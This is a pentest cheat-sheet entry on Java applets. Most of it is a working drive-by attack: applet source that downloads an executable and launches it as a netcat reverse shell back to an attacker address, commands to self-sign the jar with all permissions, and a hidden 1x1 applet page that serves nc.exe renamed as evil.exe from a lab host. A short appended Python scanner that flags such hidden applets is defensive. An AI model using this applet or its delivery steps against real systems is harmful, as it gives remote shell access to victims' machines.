Java Applets

Last updated 3 years ago

Java applets were small applications written in the Java programming language, or in another language that compiles to Java bytecode, and delivered to users as Java bytecode to be run by the browser's Java plugin (Wikipedia).

--

Exploit

import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.URL;
import java.util.*;
/**
 *  Author: Offensive Security
 *  This Java applet will download a file and execute it.
 **/
public class Java extends Applet {
	private Object initialized = null;

	public Object isInitialized() {
		return initialized;
	}

	public void init() {
		Process f;
		try {
			String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
			String expath = tmpdir + "evil.exe";
			String download = "";
			download = getParameter("1");
			
			if (download.length() > 0) { // URL parameter
				URL url = new URL(download);
				// Get an input stream for reading
				InputStream in = url.openStream();
				// Create a buffered input stream for efficiency
				BufferedInputStream bufIn = new BufferedInputStream(in);
				File outputFile = new File(expath);
				OutputStream out = new BufferedOutputStream(new
					FileOutputStream(outputFile));
				byte[] buffer = new byte[2048];
				for (;;) {
					int nBytes = bufIn.read(buffer);
					if (nBytes <= 0) break;
					out.write(buffer, 0, nBytes);
				}
				out.flush();
				out.close();
				in.close();
			}
			f = Runtime.getRuntime().exec("cmd.exe /c " + expath + " <ip> 443 -e cmd.exe"); 
		} catch(IOException e) { 
			e.printStackTrace();
		}
		/* ended here and commented out below for bypass */ 
		catch (Exception exception) {
			exception.printStackTrace();
		}
	}
}

Compile, sign, etc.

javac -source 1.7 -target 1.7 Java.java
echo "Permissions: all-permissions" > /root/manifest.txt
jar cvf Java.jar Java.class
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123

-> Fill in with bullshit

jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
cp Java.class SignedJava.jar /var/www/html/

Make exploit available to the target

echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://10.11.0.5:80/evil.exe"></applet>' > /var/www/html/java.html
locate nc.exe
cp /usr/share/windows-binaries/nc.exe /var/www/html/evil.exe
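A detection-side counterpart, added here and not part of the original guide: it parses saved HTML for <applet> tags like the one written above and flags the two traits that snippet relies on, a hidden 1x1 applet size and a parameter URL pointing at an executable. The host 198.51.100.7 and the Chart.class applet are constructed sample data.

```python
"""Triage helper (detection side) for HTML that embeds Java applets.
Flags a 1x1 (invisible) applet tag and a <param> whose value is a URL to
an executable, the two traits the applet above relies on. Sample input is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

EXEC_SUFFIXES = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".scr", ".jar")

class AppletScanner(HTMLParser):
    """Collect every <applet> with its attributes and <param> name/value pairs."""
    def __init__(self):
        super().__init__()
        self.applets, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet":
            self._cur = {**a, "params": {}}
            self.applets.append(self._cur)
        elif tag == "param" and self._cur is not None:
            self._cur["params"][a.get("name") or ""] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet":
            self._cur = None

def suspicious_applets(html):
    """Return [(code, archive, reasons)] for applets that deserve a closer look."""
    scanner = AppletScanner()
    scanner.feed(html)
    findings = []
    for ap in scanner.applets:
        reasons = []
        # A 1x1 applet is invisible to the user, but its init() still runs.
        dims = (ap.get("width") or "", ap.get("height") or "")
        if all(d.isdigit() and int(d) <= 1 for d in dims):
            reasons.append("hidden 1x1 applet")
        for value in ap["params"].values():
            u = urlparse(value)
            if u.scheme in ("http", "https") and u.path.lower().endswith(EXEC_SUFFIXES):
                reasons.append("param points to executable: " + value)
        if reasons:
            findings.append((ap.get("code"), ap.get("archive"), reasons))
    return findings

# Constructed sample page modelled on the snippet above (RFC 5737 placeholder host).
SAMPLE_HTML = ('<applet width="1" height="1" code="Java.class" archive="SignedJava.jar">'
               '<param name="1" value="http://198.51.100.7:80/evil.exe"></applet>'
               '<applet width="300" height="200" code="Chart.class"></applet>')
```

Feed it page bodies from a proxy or sandbox capture; anything it returns is a reason to pull the referenced JAR and inspect its signer and manifest before trusting it.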